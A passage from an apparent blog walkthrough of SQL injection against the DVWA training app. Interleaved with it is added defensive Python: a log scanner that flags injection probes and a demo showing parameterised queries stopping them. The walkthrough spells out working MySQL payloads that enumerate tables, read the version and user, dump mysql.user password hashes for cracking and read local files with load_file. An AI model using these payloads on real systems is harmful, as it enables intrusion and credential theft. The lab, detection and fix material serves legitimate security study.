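10.0.0.5 - - [28/Nov/2010:18:00:07 -0800] "GET /vulnerabilities/sqli/?id=a%27+OR+%27%27%3D%27&Submit=Submit HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Nov/2010:18:00:12 -0800] "GET /vulnerabilities/sqli/?id=a%27+ORDER+BY+3%3B%23&Submit=Submit HTTP/1.1" 200 1480 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Nov/2010:18:00:19 -0800] "GET /vulnerabilities/sqli/?id=a%27+OR+firstname+IS+NULL%3B%23&Submit=Submit HTTP/1.1" 200 1490 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Nov/2010:18:00:25 -0800] "GET /vulnerabilities/sqli/?id=a%27+OR+first_name+LIKE+%27%25P%25%27%3B%23&Submit=Submit HTTP/1.1" 200 1602 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Nov/2010:18:01:02 -0800] "GET /vulnerabilities/sqli/?id=O%27Brien&Submit=Submit HTTP/1.1" 200 1534 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [time] "method target protocol" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# One entry per probe shape shown on this page, matched against the decoded value.
PROBE_PATTERNS = [
    ("quote-or",        re.compile(r"'\s*OR\b", re.I)),               # a' OR ''='
    ("comment-suffix",  re.compile(r";\s*#")),                        # trailing ;#
    ("column-count",    re.compile(r"\bORDER\s+BY\s+\d+", re.I)),     # a' ORDER BY 3;#
    ("column-probe",    re.compile(r"\bIS\s+(NOT\s+)?NULL\b", re.I)), # OR firstname IS NULL
    ("substring-probe", re.compile(r"\bLIKE\s+'%", re.I)),            # LIKE '%P%'
    ("union",           re.compile(r"\bUNION\b", re.I)),              # column-matched UNION
]


def parse_line(line):
    """Named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(value):
    """Names of every probe pattern that matches an already-decoded parameter value."""
    return [name for name, rx in PROBE_PATTERNS if rx.search(value)]


def scan_log(text):
    """One record per suspicious parameter value found in the log text."""
    hits = []
    for line in text.strip().splitlines():
        entry = parse_line(line)
        if entry is None:
            continue          # a line in another format is skipped, not fatal
        params = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:          # parse_qs already decoded %xx and '+'
                tags = classify(value)
                if tags:
                    hits.append({"ip": entry["ip"], "time": entry["ts"],
                                 "param": name, "value": value, "tags": tags})
    return hits


def probes_per_ip(hits):
    """Flagged requests per client; a burst from one source within seconds is the
    signature of the manual guessing walked through on this page."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["ip"]} {h["param"]}={h["value"]!r} -> {", ".join(h["tags"])}')
    print("flagged requests per client:", dict(probes_per_ip(found)))
```

<span style="font-family: Consolas, serif;">On the constructed sample this flags the four probe requests from 10.0.0.5 (each tagged with the shapes it contains) and nothing else: the plain id=1 lookup and the O'Brien value from 10.0.0.9 pass, which is why the first pattern asks for a quote followed by OR rather than alerting on any apostrophe. Matching like this sits alongside the parameterised query, not in place of it; it tells you that somebody is working through the guessing sequence, while the bound parameter is what stops the guesses from meaning anything.</span>
</li>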
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Finding the table name - Take a guess"></a><span style="font-family: Consolas, serif;"><strong>Finding the table name – Take a guess:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR test.user_id IS NOT NULL;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">’”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; 
padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Unknown column ‘test.user_id’ in ‘where clause’</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">We are using the tablename.columnname format to help guess the table name. We must use a known column name (see Find Field Names) for this to work properly. If we guess an incorrect table name we will get an error. If, however, we guessed the correct table name, the query should not have an error.</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Try a table name of </span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">users</span></span></span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>1′ AND 1=(SELECT COUNT(*) FROM tablenames);#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”;</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This is an alternative way to brute force a table name. This will help us find any table name in the database. We can use the above method to help determine if any table that is found is the one we are currently working with.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the database name - LIKE"></a><span style="font-family: Consolas, serif;"><strong>Find the database name – LIKE:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘%A%’;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 
0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The database() function will help us find the database name. We can use the LIKE clause to help determine the name. The ‘%’ is the wildcard character: it matches 0 or more characters of any value, so %A% checks whether the database name contains the letter A. ‘</span><span style="color: red;"><span style="font-family: Consolas, serif;">_</span></span><span style="font-family: Consolas, serif;">‘ represents any single character, so you can determine the length of the database name by increasing the number of </span><span style="color: red;"><span style="font-family: Consolas, serif;">_</span></span><span style="font-family: Consolas, serif;">’s until you get a response. Try the following:</span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘__’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘____’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘%W%’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘D%’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘%Z%’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘_v_A’;#</strong></em></span></span></li>
</ul></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the table names - LIKE"></a><span style="font-family: Consolas, serif;"><strong>Find the table names – LIKE:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>a’ UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema LIKE ‘%dv%</strong></em></span></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; 
border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The SQL-92 standard (ISO 9075) includes the </span><span style="font-family: Consolas, serif;"><em>information_schema</em></span><span style="font-family: Consolas, serif;"> database. This holds information on other databases, tables, users, etc. Information_schema.</span><span style="font-family: Consolas, serif;"><em>tables</em></span><span style="font-family: Consolas, serif;"> is a list of database names (table_schema) and table names (table_name). Fortunately for us, we can request both of these at once because the original query also requested two columns. By manipulating the </span><span style="color: red;"><span style="font-family: Consolas, serif;">WHERE table_name LIKE</span></span><span style="font-family: Consolas, serif;"> phrase, we can find the names of various tables. This is not necessary for this exercise because…</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>a’ UNION SELECT table_schema, table_name FROM information_schema.tables;#</strong></em></span></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">The loop will display all of the returned rows – not just the first one. By omitting the WHERE/LIKE portion, we are able to see all of the results.</span></span></li>
</ul></li>
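<li>
Added example, not code from the original walkthrough or from DVWA itself: a Python/sqlite3 stand-in for the query attacked above, showing why the boolean LIKE probe and the UNION catalogue probe succeed against string concatenation and return nothing once the id is bound as a parameter. Assumptions: the users table and its rows are constructed here; SQLite has no `#` comment, so the probes end in `-- ` instead; and `sqlite_master` plays the role that `information_schema.tables` plays in MySQL.

```python
import sqlite3

# Constructed sample rows standing in for the users table of the walkthrough (not DVWA's own schema).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def make_db():
    """Build an in-memory database with the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the same shape as the query the walkthrough injects into."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Bound parameter: the value is data only and can never change the SQL grammar."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# Probes from the walkthrough, rewritten for SQLite (assumption: '-- ' replaces MySQL's '#').
PROBE_LIKE = "a' OR first_name LIKE '%P%'-- "
# sqlite_master stands in for information_schema.tables (assumption).
PROBE_UNION = "a' UNION SELECT name, sql FROM sqlite_master-- "


def demo():
    """Run each probe against both implementations and return the row sets."""
    conn = make_db()
    return {
        "vuln_like": lookup_vulnerable(conn, PROBE_LIKE),    # leaks rows whose first_name contains P
        "vuln_union": lookup_vulnerable(conn, PROBE_UNION),  # leaks the schema catalogue
        "safe_like": lookup_safe(conn, PROBE_LIKE),          # no row has that literal id
        "safe_union": lookup_safe(conn, PROBE_UNION),
        "safe_normal": lookup_safe(conn, "1"),               # legitimate lookup still works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The parameterized version is the fix for every probe on this page, not just these two: the bound value never reaches the parser as SQL, so neither the `OR ... LIKE` comparison nor the `UNION` is ever executed.
</li>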
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the current SQL Version"></a><span style="font-family: Consolas, serif;"><strong>Find the current SQL Version</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ UNION ALL SELECT 1, @@version;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; 
margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"> </span></span>ID: a’ UNION ALL SELECT 1, @@version;#<br />
First name: 1<br />
Surname: 5.1.41</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">Here we can see that the current version number is</span></span><span style="color: black;"><span style="font-family: Consolas, serif;"> 5.</span></span><span style="color: black;">1.41.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the current database user"></a><span style="font-family: Consolas, serif;"><strong>Find the current database user:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ UNION ALL SELECT system_user(),user();#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; 
margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Result: ID: a’ UNION ALL SELECT 1, user();#<br />
First name: root@localhost<br />
Surname: root@localhost</li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="List Password Hashes"></a><span style="font-family: Consolas, serif;"><strong>List Password Hashes:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><strong>‘</strong></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><strong>1′ UNION ALL SELECT user, password FROM mysql.user; -- priv;#’</strong></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; 
margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This will hopefully display a password hash that can then be cracked with John the Ripper or other password crackers. This could be useful for many things. If this works, check to see if they have a database management program such as phpMyAdmin – log in with what you found (and cracked).</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Reading arbitrary files"></a><span style="font-family: Consolas, serif;"><strong>Reading arbitrary files:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>‘ UNION ALL SELECT load_file(‘C:\\xampp\\htdocs\\dvwa\\.htaccess’), ’1</strong></em></span></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; 
